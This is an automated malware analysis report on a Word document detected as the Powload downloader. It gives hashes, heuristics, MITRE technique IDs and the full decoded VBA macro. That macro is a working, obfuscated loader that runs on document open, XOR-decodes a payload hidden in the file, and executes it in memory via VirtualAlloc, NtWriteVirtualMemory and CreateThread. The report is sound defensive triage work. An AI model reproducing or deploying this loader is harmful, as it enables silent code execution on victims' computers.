Office (OLE) malware analysis — malicious · 1596f730e2ceb4ae

MALICIOUS

Office (OLE)

37.1 KB Created: 2017-08-02 13:17:00 Authoring application: Microsoft Office Word First seen: 2017-08-08

MD5: e9f20a370491c0123dec8187d102bb19 SHA-1: 0d03c681949fa3c82c66b639b1c4e7e4c3b6520c SHA-256: 1596f730e2ceb4ae76997e3f806f0d1abf6e3174f4376c790cbfc93c455c99ee

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The script utilizes VirtualAlloc and CreateThread API calls, suggesting it allocates memory and creates a new thread to execute shellcode or a downloaded payload. The ClamAV detection 'Doc.Downloader.Powload-6809817-0' further indicates a downloader functionality. The embedded URL is confirmed benign, but the presence of macros and API calls points to a malicious downloader.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6809817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6809817-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    wKMqjhXCfXPLRIRMuC
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4722 bytes
SHA-256: `a4e456809ed7e81072137d5d7eafda0d8a0afbcd2ef451c0207513e5131f3b74`
Detection ClamAV: No threats found Obfuscation or payload: likely 38 of 72 identifiers look randomly generated (e.g. 'bWvtPmIZpcfJRCGQBBUckvbjiRQKfCDRiaCZqbtz') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function DoWgdpfqevxNegvMqER Lib "kernel32" Alias "CreateThread" (ByVal GEoKFCIpchbUfPPTTTAvdICs As Long, ByVal jyIwpvGcRGiFeARhWDElPaENp As Long, ByVal JoZKXcVTweZTNMvSniHnOsJohfXgb As LongPtr, TUgqMrchJ As Long, ByVal JkeNhdQS As Long, XMwgckqFLCRePSnkfMwadQfzA As Long) As LongPtr Private Declare PtrSafe Function UsRCcr Lib "kernel32" Alias "VirtualAlloc" (ByVal NtHbvLGbVIqTxzalUcOFBY As Long, ByVal WMYSbzCmgIWQbB As LongPtr, ByVal EJxmvmGsxjBuACZbiPaLowTFCtvjk As Long, ByVal JZKVyehpDgptBIzfb As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hHNbaPKhQSKbRwhWABJFeU As LongPtr, ByVal TlUvVVkfxrLcDNIZUkqopFBpTmF As LongPtr, ByVal YvwFmNUP As String, ByVal uPmFMmK As LongPtr, ByRef uDiSCPu As LongPtr) As LongPtr #Else Private Declare Function DoWgdpfqevxNegvMqER Lib "kernel32" Alias "CreateThread" (ByVal GEoKFCIpchbUfPPTTTAvdICs As Long, ByVal jyIwpvGcRGiFeARhWDElPaENp As Long, ByVal JoZKXcVTweZTNMvSniHnOsJohfXgb As Long, TUgqMrchJ As Long, ByVal JkeNhdQS As Long, XMwgckqFLCRePSnkfMwadQfzA As Long) As Long Private Declare Function UsRCcr Lib "kernel32" Alias "VirtualAlloc" (ByVal NtHbvLGbVIqTxzalUcOFBY As Long, ByVal WMYSbzCmgIWQbB As Long, ByVal EJxmvmGsxjBuACZbiPaLowTFCtvjk As Long, ByVal JZKVyehpDgptBIzfb As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal hHNbaPKhQSKbRwhWABJFeU As Long, ByVal TlUvVVkfxrLcDNIZUkqopFBpTmF As Long, ByVal YvwFmNUP As String, ByVal uPmFMmK As Long, ByRef uDiSCPu As Long) As Long #End If Const SFiHcKZpIoujuiuZN = &H1000 Const aqIXqAdHBZpnjgSAlifevuVdjJPp = &H40 Public Sub wKMqjhXCfXPLRIRMuC() Dim gnRUtWxRcFCGvyecvekdaSogXmwIe() As Byte gnRUtWxRcFCGvyecvekdaSogXmwIe = KMJpSSlVWDQzZTJLXiQWthnp(ActiveDocument.FullName) Dim hYjKXnEPtuLqUXDrumNGwIjzYnYLX As String hYjKXnEPtuLqUXDrumNGwIjzYnYLX = StrConv(gnRUtWxRcFCGvyecvekdaSogXmwIe, 64) Dim zPMdxDxL zPMdxDxL = Split(hYjKXnEPtuLqUXDrumNGwIjzYnYLX, "bWvtPmIZpcfJRCGQBBUckvbjiRQKfCDRiaCZqbtzVyFYiSWCmYGZWuUGUmlXvXUMyoAQaGzAiuhLQcaqVnxhWEVOgWf") Dim QyFLPrKYrCGSjUxCz As String Dim MjxXpLDuCzuHKBXFbop As String Dim kgKUvDewzMgiPFEfRX As String MjxXpLDuCzuHKBXFbop = StrConv(StrConv(zPMdxDxL(UBound(zPMdxDxL)), 64), 128) kgKUvDewzMgiPFEfRX = Mid$(MjxXpLDuCzuHKBXFbop, 3, Len(MjxXpLDuCzuHKBXFbop)) QyFLPrKYrCGSjUxCz = PuukywTUkCpuSRqsFyDCMHhVPslSe("PvdXESAUsfC", kgKUvDewzMgiPFEfRX) #If VBA7 Then Dim TXTCDfWRUpH As LongPtr Dim ujaavenqUXlUJCFuFNG As LongPtr #Else Dim TXTCDfWRUpH As Long Dim ujaavenqUXlUJCFuFNG As Long #End If TXTCDfWRUpH = UsRCcr(0, Len(QyFLPrKYrCGSjUxCz), SFiHcKZpIoujuiuZN, aqIXqAdHBZpnjgSAlifevuVdjJPp) ujaavenqUXlUJCFuFNG = NtWriteVirtualMemory(-1, TXTCDfWRUpH, QyFLPrKYrCGSjUxCz, Len(QyFLPrKYrCGSjUxCz), 0) ujaavenqUXlUJCFuFNG = DoWgdpfqevxNegvMqER(0, 0, TXTCDfWRUpH, 0, 0, 0) End Sub Public Function KMJpSSlVWDQzZTJLXiQWthnp(ByVal iropUoBXPNYRBFMzUvhhR As String) As Byte() Dim MjxXpLDuCzuHKBXFbop As Long Dim kgKUvDewzMgiPFEfRX() As Byte MjxXpLDuCzuHKBXFbop = FreeFile If LenB(Dir(iropUoBXPNYRBFMzUvhhR)) Then Open iropUoBXPNYRBFMzUvhhR For Binary Access Read As MjxXpLDuCzuHKBXFbop ReDim kgKUvDewzMgiPFEfRX(LOF(MjxXpLDuCzuHKBXFbop) - 1&) As Byte Get MjxXpLDuCzuHKBXFbop, , kgKUvDewzMgiPFEfRX Close MjxXpLDuCzuHKBXFbop Else Err.Raise 53 End If KMJpSSlVWDQzZTJLXiQWthnp = kgKUvDewzMgiPFEfRX Erase kgKUvDewzMgiPFEfRX End Function Public Sub Document_Open() wKMqjhXCfXPLRIRMuC End Sub Sub Workbook_Open() Document_Open End Sub Public Function PuukywTUkCpuSRqsFyDCMHhVPslSe(RNdpAhPVlxBITTjsnqzmYHovminz As String, gkbPoLCqDrjDKmf As String) As String Dim eNnLx As Long Dim UtSYkyI As String Dim sTpAfm As Integer, SNgHXGyGcIEzBY As Integer, a As Long For eNnLx = 1 To Len(gkbPoLCqDrjDKmf) a = eNnLx Mod Len(RNdpAhPVlxBITTjsnqzmYHovminz) If a = 0 Then a = Len(RNdpAhPVlxBITTjsnqzmYHovminz) sTpAfm = Asc(Mid$(gkbPoLCqDrjDKmf, eNnLx, 1)) SNgHXGyGcIEzBY = Asc(Mid$(RNdpAhPVlxBITTjsnqzmYHovminz, a, 1)) UtSYkyI = UtSYkyI + Chr(sTpAfm Xor SNgHXGyGcIEzBY) Next eNnLx PuukywTUkCpuSRqsFyDCMHhVPslSe = UtSYkyI End Function

Open this report in the interactive analyzer, or submit your own file for analysis.